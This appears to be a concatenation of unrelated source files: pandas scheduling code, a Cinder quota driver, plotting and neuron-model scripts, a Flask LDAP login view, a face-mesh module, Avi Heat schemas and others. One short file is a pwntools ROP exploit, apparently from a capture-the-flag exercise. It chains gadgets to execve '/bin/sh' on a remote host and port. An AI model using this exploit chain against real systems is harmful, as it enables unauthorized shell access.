aggfunc=lambda x: len(x)) == 1)
return cf
def remove_subject(self, subject_id):
self.sched_df = self.sched_df[self.sched_df['Subject'] != subject_id]
if subject_id in self.subjects:
self.subjects.remove(subject_id)
def isolate_subjects(self, subject_ids):
self.sched_df = self.sched_df[self.sched_df['Subject']
.isin(subject_ids)]
self.subjects = subject_ids
def isolate_tasks(self, task_names):
self.sched_df = self.sched_df[self.sched_df['Task_Name']
.isin(task_names)]
def isolate_data_sources(self, data_source_names):
self.sched_df = self.sched_df[self.sched_df['Data_Source_Name']
.isin(data_source_names)]
def get_file_paths(self, subject_id, task_name, data_source_name):
"""Return all a dictionary of all files for a given subject, task,
and data source."""
if self.sched_df.empty:
raise Exception('Schedule is empty, try Schedule.compile(path).')
sub_df = self.sched_df[
(self.sched_df['Subject'] == subject_id)
& (self.sched_df['Task_Name'] == task_name)
& (self.sched_df['Data_Source_Name'] == data_source_name)
]
if sub_df.empty:
raise Exception(
'({}, {}, {}) not found in schedule.'.format(subject_id,
task_name,
data_source_name)
)
list_of_files = sub_df[['File', 'Path']].to_dict('records')
files_dict = {ds['File']: ds['Path'] for ds in list_of_files}
return files_dict
@staticmethod
def search(raw, data_paths):
"""Search the data paths for matching file patterns and return a pandas
DataFrame of the results."""
files_dict = []
for task_name, task in raw.iteritems():
for data_source_name, patterns in task.iteritems():
for pattern_name, pattern in patterns.iteritems():
for data_path in data_paths:
for root, _, files in os.walk(data_path):
for filepath in files:
file_match = re.match(pattern, filepath)
if file_match:
fd = file_match.groupdict()
fd['Task_Name'] = task_name
fd['Data_Source_Name'] = data_source_name
fd['File'] = pattern_name
fd['Path'] = os.path.join(root, filepath)
files_dict.append(fd)
files_df = pd.DataFrame(files_dict)
files_df.fillna({'Task_Order': 0}, inplace=True)
files_df[['Subject', 'Task_Order']] = \
files_df[['Subject', 'Task_Order']].astype(np.int64)
return files_df
@staticmethod
def _resolve(files_df):
"""
Resolve any files that matched multiple Task_Order values and
return a subset of the Data Frame.
Args:
files_df (pandas.DataFrame): a DataFrame resulting from
Schedule.search().
"""
counter = files_df.groupby(['Subject',
'Data_Source_Name',
'File',
'Task_Name'])['Task_Order'].count()
maps = counter[counter == 1]
maps = maps.reset_index()
maps.drop('Task_Order', axis=1, inplace=True)
orders = pd.merge(maps, files_df)[['Subject',
'Task_Name',
'Task_Order']]
orders.drop_duplicates(inplace=True)
sched_df = pd.merge(orders, files_df)[['Subject',
'Task_Name',
'Task_Order',
'File',
'Data_Source_Name',
'Path']]
return sched_df
@staticmethod
def validate_schema(raw):
"""Validate the schedule dictionary against the schema described
above."""
schema = Schema({str: {str: {str: str}}})
return schema.validate(raw)
@staticmethod
def validate_data_source_names(raw, data_source_names):
"""
Validate that all data source names are contained in the
data_source_names list.
Args:
data_source_names (list(str)): list of valid data source names
implemented in pypsych.
"""
for _, task in raw.iteritems():
for data_source_name in task.keys():
if data_source_name not in data_source_names:
raise Exception(
'Schedule could not validate data source ',
data_source_name
)
@staticmethod
def validate_patterns(raw):
"""Validate that all file pattern regex expressions yield Task_Order
and Subject fields."""
for _, task in raw.iteritems():
for _, data_source in task.iteritems():
for _, pattern in data_source.iteritems():
compiled_pattern = re.compile(pattern)
for group_name in compiled_pattern.groupindex.keys():
if group_name not in ['Task_Order', 'Subject']:
raise Exception(
'Schedule could not validate pattern ',
pattern
)
| 9,380 | 2,465 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import defaultdict
from oslo_log import log
from cinderclient import client
from dcorch.common import exceptions
from dcorch.drivers import base
LOG = log.getLogger(__name__)
API_VERSION = '2'
class CinderClient(base.DriverBase):
'''Cinder V2 driver.'''
def __init__(self, region, disabled_quotas, session, endpoint_type):
try:
self.cinder = client.Client(API_VERSION,
session=session,
region_name=region,
endpoint_type=endpoint_type)
self.no_volumes = True if 'volumes' in disabled_quotas else False
except exceptions.ServiceUnavailable:
raise
def get_resource_usages(self, project_id):
"""Calculate resources usage and return the dict
:param: project_id
:return: resource usage dict
TODO: support the rest of the quotas
"""
if not self.no_volumes:
try:
quota_usage = self.cinder.quotas.get(
project_id, usage=True)
quota_usage_dict = quota_usage.to_dict()
del quota_usage_dict['id']
resource_usage = defaultdict(dict)
for resource in quota_usage_dict:
# NOTE: May be able to remove "reserved" if
# cinder will never set it. Need to check.
resource_usage[resource] = (
quota_usage_dict[resource]['in_use'] +
quota_usage_dict[resource]['reserved'])
return resource_usage
except exceptions.InternalError:
raise
def get_quota_limits(self, project_id):
"""Get the resource limits"""
try:
quotas = self.cinder.quotas.get(
project_id, usage=False)
quotas_dict = quotas.to_dict()
del quotas_dict['id']
return quotas_dict
except exceptions.InternalError:
raise
def update_quota_limits(self, project_id, **new_quota):
"""Update the limits"""
try:
if not self.no_volumes:
return self.cinder.quotas.update(project_id, **new_quota)
except exceptions.InternalError:
raise
def delete_quota_limits(self, project_id):
"""Delete/Reset the limits"""
try:
if not self.no_volumes:
return self.cinder.quotas.delete(project_id)
except exceptions.InternalError:
raise
| 3,160 | 840 |
import numpy as np
from matplotlib import pyplot as plt
import figlatex
import template
import afterpulse_tile21
styles = {
5.5: dict(color='#f55'),
7.5: dict(hatch='//////', facecolor='#0000'),
9.5: dict(edgecolor='black', facecolor='#0000'),
}
fig, ax = plt.subplots(num='figshape', clear=True, figsize=[7, 3.3])
for vov, style in styles.items():
ap21 = afterpulse_tile21.AfterPulseTile21(vov)
templates = []
for files in ap21.filelist:
file = files['templfile']
templ = template.Template.load(file)
kw = dict(timebase=1, aligned=True, randampl=False)
y, = templ.generate(templ.template_length, [0], **kw)
templates.append(y)
m = np.mean(templates, axis=0)
s = np.std(templates, axis=0, ddof=1)
norm = np.min(m)
ax.fill_between(np.arange(len(m)), (m - s) / norm, (m + s) / norm, label=f'{vov} V', zorder=2, **style)
ax.minorticks_on()
ax.grid(True, 'major', linestyle='--')
ax.grid(True, 'minor', linestyle=':')
ax.legend(title='Overvoltage')
ax.set_xlabel('Sample number after trigger @ 1 GSa/s')
ax.set_xlim(0, 1000)
fig.tight_layout()
fig.show()
figlatex.save(fig)
| 1,202 | 483 |
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 11:08:56 2021
@author: yasse
"""
# =============================================================================
# Imports
# =============================================================================
import requests
from . import ipaddr as u
from .public import getTickers
# =============================================================================
# Initialize
# =============================================================================
def init(group_token):
"""
Initializing the connection and authenticating the token.
"""
if type(group_token) == str:
pass
else:
raise ValueError("""
You have entered a wrong value. Make sure that the token is in the
form of a string like :
'171beb3a-b3bc-4j76-9s89-39332218106e' """)
u.token = group_token
u.tickers = u.tickers + getTickers()
url = u.url
auth_url= url + '/auth/login'
body ={"token": u.token}
response = requests.post(auth_url, json = body).status_code
if response == 200:
pass
else:
raise NameError("""
The token you entered is not valid. Please make sure that its spelled
correctly and try again. Contact someone for support if you get this
more than once.
""")
print(f"""
Welcome to the LINC Hackathon! Your token is now saved in the Console.
That means you don't need to carry that out when using the other functions
as long as you don't close your console.
This function is only to be used once to authenticate your token.
You can use the link below to view the dashboard:
hackathon.linclund.com
Happy coding!
""")
| 1,940 | 531 |
"""
Module for loading BluePyOpt optimized model files
"""
import os
import sciunit
from neuronunit.capabilities import ReceivesSquareCurrent, ProducesMembranePotential, Runnable
from neuron import h
import neo
from quantities import ms
import zipfile
import json
import collections
class CellModel(sciunit.Model,
ReceivesSquareCurrent,
ProducesMembranePotential,
Runnable):
def __init__(self, model_path=None, model_name=None, run_alerts=False):
# `model_path` is the path to the model's directory
if not os.path.isdir(model_path):
raise IOError("Invalid model path: {}".format(model_path))
if not model_name:
file_name = os.path.basename(model_path)
model_name = file_name.split(".")[0]
self.model_name = model_name
self.base_path = model_path
self.owd = os.getcwd() # original working directory saved to return later
self.run_alerts = run_alerts
self.load_mod_files()
self.load_cell_hoc()
# get model template name
# could also do this via other JSON, but morph.json seems dedicated for template info
with open(os.path.join(self.base_path, "config", "morph.json")) as morph_file:
model_template = list(json.load(morph_file, object_pairs_hook=collections.OrderedDict).keys())[0]
# access model config info
with open(os.path.join(self.base_path, "config", "parameters.json")) as params_file:
params_data = json.load(params_file, object_pairs_hook=collections.OrderedDict)
# extract v_init and celsius (if available)
v_init = None
celsius = None
try:
for item in params_data[model_template]["fixed"]["global"]:
# would have been better if info was stored inside a dict (rather than a list)
if "v_init" in item:
item.remove("v_init")
v_init = float(item[0])
if "celsius" in item:
item.remove("celsius")
celsius = float(item[0])
except:
pass
if v_init == None:
h.v_init = -70.0
print("Could not find model specific info for `v_init`; using default value of {} mV".format(str(h.v_init)))
else:
h.v_init = v_init
if celsius == None:
h.celsius = 34.0
print("Could not find model specific info for `celsius`; using default value of {} degrees Celsius".format(str(h.celsius)))
else:
h.celsius = celsius
self.cell = getattr(h, model_template)(os.path.join(str(self.base_path), "morphology"))
self.iclamp = h.IClamp(0.5, sec=self.cell.soma[0])
self.vm = h.Vector()
self.vm.record(self.cell.soma[0](0.5)._ref_v)
sciunit.Model.__init__(self, name=model_name)
def load_mod_files(self):
os.chdir(self.base_path)
libpath = "x86_64/.libs/libnrnmech.so.0"
os.system("nrnivmodl mechanisms") # do nrnivmodl in mechanisms directory
if not os.path.isfile(os.path.join(self.base_path, libpath)):
raise IOError("Error in compiling mod files!")
h.nrn_load_dll(str(libpath))
os.chdir(self.owd)
def load_cell_hoc(self):
with open(os.path.join(self.base_path, self.model_name+'_meta.json')) as meta_file:
meta_data = json.load(meta_file, object_pairs_hook=collections.OrderedDict)
best_cell = meta_data["best_cell"]
self.hocpath = os.path.join(self.base_path,"checkpoints",str(best_cell))
if os.path.exists(self.hocpath):
print("Model = {}: using (best cell) {}".format(self.model_name,best_cell))
else:
self.hocpath = None
for filename in os.listdir(os.path.join(self.base_path, "checkpoints")):
if filename.startswith("cell") and filename.endswith(".hoc"):
self.hocpath = os.path.join(self.base_path, "checkpoints", filename)
print("Model = {}: cell.hoc not found in /checkpoints; using {}".format(self.model_name,filename))
break
if not os.path.exists(self.hocpath):
raise IOError("No appropriate .hoc file found in /checkpoints")
h.load_file(str(self.hocpath))
def get_membrane_potential(self):
"""Must return a neo.AnalogSignal."""
signal = neo.AnalogSignal(self.vm,
units="mV",
sampling_period=h.dt * ms)
return signal
def inject_current(self, current):
"""
Injects somatic current into the model.
Parameters
----------
current : a dictionary like:
{'amplitude':-10.0*pq.pA,
'delay':100*pq.ms,
'duration':500*pq.ms}}
where 'pq' is the quantities package
"""
self.iclamp.amp = current["amplitude"]
self.iclamp.delay = current["delay"]
self.iclamp.dur = current["duration"]
def run(self, tstop):
t_alert = 100.0
h.check_simulator()
h.cvode.active(0)
self.vm.resize(0)
h.finitialize(h.v_init)
while h.t < tstop:
h.fadvance()
if self.run_alerts and h.t > t_alert:
print("\tTime: {} ms out of {} ms".format(t_alert, tstop))
t_alert += 100.0
| 5,559 | 1,726 |
"""Invenio-LDAPClient login view."""
from __future__ import absolute_import, print_function
import uuid
from flask import Blueprint, after_this_request
from flask import current_app as app
from flask import flash, redirect, render_template, request
from flask_security import login_user
from invenio_accounts.models import User
from invenio_db import db
from invenio_userprofiles.models import UserProfile
from ldap3 import ALL, ALL_ATTRIBUTES, Connection, Server
from werkzeug.local import LocalProxy
from .forms import login_form_factory
_security = LocalProxy(lambda: app.extensions['security'])
_datastore = LocalProxy(lambda: _security.datastore)
blueprint = Blueprint(
'invenio_ldapclient',
__name__,
template_folder='templates',
static_folder='static',
)
def _commit(response=None):
_datastore.commit()
return response
def _ldap_connection(form):
"""Make LDAP connection based on configuration."""
if not form.validate_on_submit():
return False
form_pass = form.password.data
form_user = form.username.data
if not form_user or not form_pass:
return False
if app.config['LDAPCLIENT_CUSTOM_CONNECTION']:
return app.config['LDAPCLIENT_CUSTOM_CONNECTION'](
form_user, form_pass
)
ldap_server_kwargs = {
'port': app.config['LDAPCLIENT_SERVER_PORT'],
'get_info': ALL,
'use_ssl': app.config['LDAPCLIENT_USE_SSL']
}
if app.config['LDAPCLIENT_TLS']:
ldap_server_kwargs['tls'] = app.config['LDAPCLIENT_TLS']
server = Server(
app.config['LDAPCLIENT_SERVER_HOSTNAME'],
**ldap_server_kwargs
)
ldap_user = "{}={},{}".format(
app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'],
form_user,
app.config['LDAPCLIENT_BIND_BASE']
)
return Connection(server, ldap_user, form_pass)
def _search_ldap(connection, username):
"""Fetch the user entry from LDAP."""
search_attribs = app.config['LDAPCLIENT_SEARCH_ATTRIBUTES']
if search_attribs is None:
search_attribs = ALL_ATTRIBUTES
connection.search(
app.config['LDAPCLIENT_SEARCH_BASE'],
'({}={})'.format(
app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'], username
),
attributes=search_attribs)
def _register_or_update_user(entries, user_account=None):
"""Register or update a user."""
email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
username = entries[app.config['LDAPCLIENT_USERNAME_ATTRIBUTE']].values[0]
if 'LDAPCLIENT_FULL_NAME_ATTRIBUTE' in app.config:
full_name = entries[app.config[
'LDAPCLIENT_FULL_NAME_ATTRIBUTE'
]].values[0]
if user_account is None:
kwargs = dict(email=email, active=True, password=uuid.uuid4().hex)
_datastore.create_user(**kwargs)
user_account = User.query.filter_by(email=email).one_or_none()
profile = UserProfile(user_id=int(user_account.get_id()))
else:
user_account.email = email
db.session.add(user_account)
profile = user_account.profile
profile.full_name = full_name
profile.username = username
db.session.add(profile)
return user_account
def _find_or_register_user(connection, username):
"""Find user by email, username or register a new one."""
_search_ldap(connection, username)
entries = connection.entries[0]
if not entries:
return None
try:
email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
except IndexError:
# Email is required
return None
# Try by username first
user = User.query.join(UserProfile).filter(
UserProfile.username == username
).one_or_none()
# Try by email next
if not user and app.config['LDAPCLIENT_FIND_BY_EMAIL']:
user = User.query.filter_by(email=email).one_or_none()
if user:
if not user.active:
return None
return _register_or_update_user(entries, user_account=user)
# Register new user
if app.config['LDAPCLIENT_AUTO_REGISTRATION']:
return _register_or_update_user(entries)
@blueprint.route('/ldap-login', methods=['GET', 'POST'])
def ldap_login():
"""
LDAP login form view.
Process login request using LDAP and register
the user if needed.
"""
form = login_form_factory(app)()
if form.validate_on_submit():
connection = _ldap_connection(form)
if connection and connection.bind():
after_this_request(_commit)
user = _find_or_register_user(connection, form.username.data)
if user and login_user(user, remember=False):
next_page = request.args.get('next')
# Only allow relative URL for security
if not next_page or next_page.startswith('http'):
next_page = app.config['SECURITY_POST_LOGIN_VIEW']
connection.unbind()
db.session.commit()
return redirect(next_page)
else:
connection.unbind()
flash("We couldn't log you in, please contact your administrator.") # noqa
else:
flash("We couldn't log you in, please check your password.")
return render_template(
app.config['SECURITY_LOGIN_USER_TEMPLATE'],
login_user_form=form
)
| 5,401 | 1,706 |
from random import randint
perder = ganhou = 0
print('\n=-=-=-=-TENTE GANHAR DE MIM NO PAR OU ÍMPAR!=-=-=-=-\n')
while True:
print('-=' * 15)
eu = int(input('Digite um número: '))
pc = randint(1, 100)
par_ganhou = impar_ganhou = 0
i_p = ' '
while i_p not in 'IP':
i_p = input('Você escolhe ímpar ou par? [I/P]: ') .strip() .upper()[0]
soma = eu + pc
print('-=' * 15)
if i_p == 'P' and soma % 2 == 0:
print(f'VOCÊ GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é PAR.')
ganhou += 1
elif i_p == 'I' and soma % 2 != 0:
print(f'VOCÊ GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é ÍMPAR.')
ganhou += 1
else:
x = ''
if soma % 2 == 0:
x = 'PAR'
else:
x = 'ÍMPAR'
print(f'O COMPUTADOR GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é {x}.')
perder += 1
if perder != 0:
break
print('-'*50)
print(f'Você PERDEU! Você conseguiu ganhar {ganhou} vezes consecutivamente!')
print('-'*50)
| 1,125 | 490 |
from . import *
class UntrackSectionController(AppDevController):
def get_path(self):
return "/sections/untrack/"
def get_methods(self):
return ["POST"]
@authorize_user
def content(self, **kwargs):
data = request.get_json()
user = kwargs.get("user")
catalog_num = data.get("course_id")
if not catalog_num:
raise Exception("Must provide catalog number.")
section = users_dao.untrack_section(user.id, catalog_num)
return section.serialize_with_user(user.id)
| 553 | 165 |
# -*- encoding: utf-8 -*-
#@File : stop.py
#@Time : 2021/12/23 16:21:37
#@Author : J0ins08
#@Software : Visual Studio Code
from aria2 import *
if __name__ == '__main__':
remove_aria2_file()
remove_download_file()
remove_torrent_file() | 281 | 126 |
from pwn import *
import time
context.arch = "amd64"
ip = "140.110.112.77"
port = 3122
r = remote(ip, port)
# r = process("./rop1")
data = 0x6ccd60
pop_rsi = 0x401637
pop_rax_rdx_rbx = 0x478616
pop_rdi = 0x401516
syscall = 0x4672b5
leave = 0x4009e4
r.sendline(flat(0xdeadbeef, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00'))
r.sendlineafter("=", b'a' * 32 + flat(data, leave))
r.interactive()
| 446 | 265 |
"""
Face Mesh Module
By : JikanDev
Website : https://jikandev.xyz/
"""
import cv2
import mediapipe as mp
class FaceMeshDetector():
"""
Find 468 Landmarks using the mediapipe library. Exports the landmarks in pixel format.
"""
def __init__(self, mode=False, maxFaces=1, refine_lm=False, minDetectCon=0.5, minTrackCon=0.5):
"""
:param mode: In static mode, detection is done on each image: slower.
:param maxFaces: Maximum number of faces to detect.
:param refine_lm: Whether to further refine the landmark coordinates
around the eyes and lips, and output additional landmarks around the
irises.
:param minDetectCon: Minimum Detection Confidence Threshold.
:param minTrackCon: Minimum Tracking Confidence Threshold.
"""
self.mode = mode
self.maxFaces = maxFaces
self.refine_lm = refine_lm
self.minDetectCon = minDetectCon
self.minTrackCon = minTrackCon
self.mpDraw = mp.solutions.drawing_utils
self.mpDrawingStyles = mp.solutions.drawing_styles
self.faceMesh = mp.solutions.face_mesh
self.meshDetection = self.faceMesh.FaceMesh(mode, maxFaces, refine_lm, minDetectCon, minTrackCon)
def findFaces(self, img, draw=True, drawTesselation=True):
"""
Find faces in an image and return the bbox info
:param img: Image to find the faces in.
:param draw: Flag to draw the output contours of the mesh on the image.
:param drawTesselation: Flag to draw the output tesselation of the mesh on the image.
:return: Image with or without drawings.
"""
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.meshDetection.process(imgRGB)
allFaces = []
h, w, c = img.shape
if self.results.multi_face_landmarks:
for faceLms in self.results.multi_face_landmarks:
myMesh = {}
mylmList = []
for id, lm in enumerate(faceLms.landmark):
px, py = int(lm.x * w), int(lm.y * h)
mylmList.append([px, py])
myMesh["lmList"] = mylmList
if draw:
self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_CONTOURS, None)
if drawTesselation:
self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_TESSELATION, None,
self.mpDrawingStyles.get_default_face_mesh_tesselation_style())
allFaces.append(myMesh)
return allFaces, img
def main():
"""
Example code to use the module.
"""
cap = cv2.VideoCapture(0) # Get your camera
detector = FaceMeshDetector() # Call the FaceMeshDetector class
while True:
success, img = cap.read() # If success, img = read your camera image
meshes, img = detector.findFaces(img) # meshes & img call the findFaces() function of FaceMeshDetector
if meshes:
# Mesh 1
mesh1 = meshes[0]
lmList1 = mesh1["lmList"] # List of 21 Landmark points
if len(meshes) == 2:
# Mesh 2
mesh2 = meshes[1]
lmList2 = mesh2["lmList"] # List of 21 Landmark points
cv2.imshow("Face Mesh Module", img)
cv2.waitKey(1)
if __name__ == "__main__":
main() | 3,548 | 1,155 |
# GENERATED FILE - DO NOT EDIT THIS FILE UNLESS YOU ARE A WIZZARD
#pylint: skip-file
from heat.engine import properties
from heat.engine import constraints
from heat.engine import attributes
from heat.common.i18n import _
from avi.heat.avi_resource import AviResource
from avi.heat.avi_resource import AviNestedResource
from options import *
from common import *
from options import *
from rate import *
from match import *
class FailActionHTTPLocalResponse(object):
# all schemas
status_code_schema = properties.Schema(
properties.Schema.STRING,
_(" (Default: FAIL_HTTP_STATUS_CODE_503)"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['FAIL_HTTP_STATUS_CODE_200', 'FAIL_HTTP_STATUS_CODE_503']),
],
)
file_schema = properties.Schema(
properties.Schema.MAP,
_(""),
schema=HTTPLocalFile.properties_schema,
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'status_code',
'file',
)
# mapping of properties to their schemas
properties_schema = {
'status_code': status_code_schema,
'file': file_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'file': getattr(HTTPLocalFile, 'field_references', {}),
}
unique_keys = {
'file': getattr(HTTPLocalFile, 'unique_keys', {}),
}
class PriorityLabels(AviResource):
resource_name = "prioritylabels"
# all schemas
avi_version_schema = properties.Schema(
properties.Schema.STRING,
_("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
required=False,
update_allowed=True,
)
name_schema = properties.Schema(
properties.Schema.STRING,
_("The name of the priority labels."),
required=True,
update_allowed=True,
)
equivalent_labels_item_schema = properties.Schema(
properties.Schema.MAP,
_("Equivalent priority labels in descending order."),
schema=EquivalentLabels.properties_schema,
required=True,
update_allowed=False,
)
equivalent_labels_schema = properties.Schema(
properties.Schema.LIST,
_("Equivalent priority labels in descending order."),
schema=equivalent_labels_item_schema,
required=False,
update_allowed=True,
)
description_schema = properties.Schema(
properties.Schema.STRING,
_("A description of the priority labels."),
required=False,
update_allowed=True,
)
cloud_uuid_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=False,
)
# properties list
PROPERTIES = (
'avi_version',
'name',
'equivalent_labels',
'description',
'cloud_uuid',
)
# mapping of properties to their schemas
properties_schema = {
'avi_version': avi_version_schema,
'name': name_schema,
'equivalent_labels': equivalent_labels_schema,
'description': description_schema,
'cloud_uuid': cloud_uuid_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'equivalent_labels': getattr(EquivalentLabels, 'field_references', {}),
}
unique_keys = {
'equivalent_labels': getattr(EquivalentLabels, 'unique_keys', {}),
}
class PoolGroupMember(object):
# all schemas
pool_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("UUID of the pool You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=True,
update_allowed=True,
)
ratio_schema = properties.Schema(
properties.Schema.NUMBER,
_("Ratio of selecting eligible pools in the pool group. (Default: 1)"),
required=False,
update_allowed=True,
)
priority_label_schema = properties.Schema(
properties.Schema.STRING,
_("All pools with same label are treated similarly in a pool group. A pool with a higher priority is selected, as long as the pool is eligible or an explicit policy chooses a different pool."),
required=False,
update_allowed=True,
)
deployment_state_schema = properties.Schema(
properties.Schema.STRING,
_("Pool deployment state used with the PG deployment policy"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['EVALUATION_FAILED', 'EVALUATION_IN_PROGRESS', 'IN_SERVICE', 'OUT_OF_SERVICE']),
],
)
# properties list
PROPERTIES = (
'pool_uuid',
'ratio',
'priority_label',
'deployment_state',
)
# mapping of properties to their schemas
properties_schema = {
'pool_uuid': pool_uuid_schema,
'ratio': ratio_schema,
'priority_label': priority_label_schema,
'deployment_state': deployment_state_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'pool_uuid': 'pool',
}
unique_keys = {
'my_key': 'pool_uuid,priority_label',
}
class AbPool(object):
# all schemas
pool_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Pool configured as B pool for A/B testing You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=True,
update_allowed=True,
)
ratio_schema = properties.Schema(
properties.Schema.NUMBER,
_("Ratio of traffic diverted to the B pool, for A/B testing (Default: 0)"),
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'pool_uuid',
'ratio',
)
# mapping of properties to their schemas
properties_schema = {
'pool_uuid': pool_uuid_schema,
'ratio': ratio_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'pool_uuid': 'pool',
}
class FailActionBackupPool(object):
# all schemas
backup_pool_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Specifies the UUID of the Pool acting as backup pool. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=True,
update_allowed=True,
)
# properties list
PROPERTIES = (
'backup_pool_uuid',
)
# mapping of properties to their schemas
properties_schema = {
'backup_pool_uuid': backup_pool_uuid_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'backup_pool_uuid': 'pool',
}
class FailActionHTTPRedirect(object):
# all schemas
protocol_schema = properties.Schema(
properties.Schema.STRING,
_(" (Default: HTTPS)"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['HTTP', 'HTTPS']),
],
)
host_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=True,
update_allowed=True,
)
path_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=True,
)
query_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=True,
)
status_code_schema = properties.Schema(
properties.Schema.STRING,
_(" (Default: HTTP_REDIRECT_STATUS_CODE_302)"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['HTTP_REDIRECT_STATUS_CODE_301', 'HTTP_REDIRECT_STATUS_CODE_302', 'HTTP_REDIRECT_STATUS_CODE_307']),
],
)
# properties list
PROPERTIES = (
'protocol',
'host',
'path',
'query',
'status_code',
)
# mapping of properties to their schemas
properties_schema = {
'protocol': protocol_schema,
'host': host_schema,
'path': path_schema,
'query': query_schema,
'status_code': status_code_schema,
}
class PGDeploymentRule(object):
# all schemas
metric_id_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=True,
)
operator_schema = properties.Schema(
properties.Schema.STRING,
_(" (Default: CO_GE)"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['CO_EQ', 'CO_GE', 'CO_GT', 'CO_LE', 'CO_LT', 'CO_NE']),
],
)
threshold_schema = properties.Schema(
properties.Schema.NUMBER,
_("metric threshold that is used as the pass fail. If it is not provided then it will simply compare it with current pool vs new pool"),
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'metric_id',
'operator',
'threshold',
)
# mapping of properties to their schemas
properties_schema = {
'metric_id': metric_id_schema,
'operator': operator_schema,
'threshold': threshold_schema,
}
class DiscoveredNetwork(object):
# all schemas
network_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Discovered network for this IP. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=True,
update_allowed=True,
)
subnet_item_schema = properties.Schema(
properties.Schema.MAP,
_("Discovered subnet for this IP."),
schema=IpAddrPrefix.properties_schema,
required=True,
update_allowed=False,
)
subnet_schema = properties.Schema(
properties.Schema.LIST,
_("Discovered subnet for this IP."),
schema=subnet_item_schema,
required=False,
update_allowed=True,
)
subnet6_item_schema = properties.Schema(
properties.Schema.MAP,
_("(Introduced in: 18.1.1) Discovered IPv6 subnet for this IP."),
schema=IpAddrPrefix.properties_schema,
required=True,
update_allowed=False,
)
subnet6_schema = properties.Schema(
properties.Schema.LIST,
_("(Introduced in: 18.1.1) Discovered IPv6 subnet for this IP."),
schema=subnet6_item_schema,
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'network_uuid',
'subnet',
'subnet6',
)
# mapping of properties to their schemas
properties_schema = {
'network_uuid': network_uuid_schema,
'subnet': subnet_schema,
'subnet6': subnet6_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'subnet': getattr(IpAddrPrefix, 'field_references', {}),
'subnet6': getattr(IpAddrPrefix, 'field_references', {}),
'network_uuid': 'network',
}
unique_keys = {
'subnet': getattr(IpAddrPrefix, 'unique_keys', {}),
'subnet6': getattr(IpAddrPrefix, 'unique_keys', {}),
}
class FailAction(object):
# all schemas
type_schema = properties.Schema(
properties.Schema.STRING,
_("Enables a response to client when pool experiences a failure. By default TCP connection is closed. (Default: FAIL_ACTION_CLOSE_CONN)"),
required=True,
update_allowed=True,
constraints=[
constraints.AllowedValues(['FAIL_ACTION_BACKUP_POOL', 'FAIL_ACTION_CLOSE_CONN', 'FAIL_ACTION_HTTP_LOCAL_RSP', 'FAIL_ACTION_HTTP_REDIRECT']),
],
)
redirect_schema = properties.Schema(
properties.Schema.MAP,
_("URL to redirect HTTP requests to when pool experiences a failure"),
schema=FailActionHTTPRedirect.properties_schema,
required=False,
update_allowed=True,
)
local_rsp_schema = properties.Schema(
properties.Schema.MAP,
_("Local response to HTTP requests when pool experiences a failure"),
schema=FailActionHTTPLocalResponse.properties_schema,
required=False,
update_allowed=True,
)
backup_pool_schema = properties.Schema(
properties.Schema.MAP,
_("(Deprecated in: 18.1.2) Backup Pool when pool experiences a failure"),
schema=FailActionBackupPool.properties_schema,
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'type',
'redirect',
'local_rsp',
'backup_pool',
)
# mapping of properties to their schemas
properties_schema = {
'type': type_schema,
'redirect': redirect_schema,
'local_rsp': local_rsp_schema,
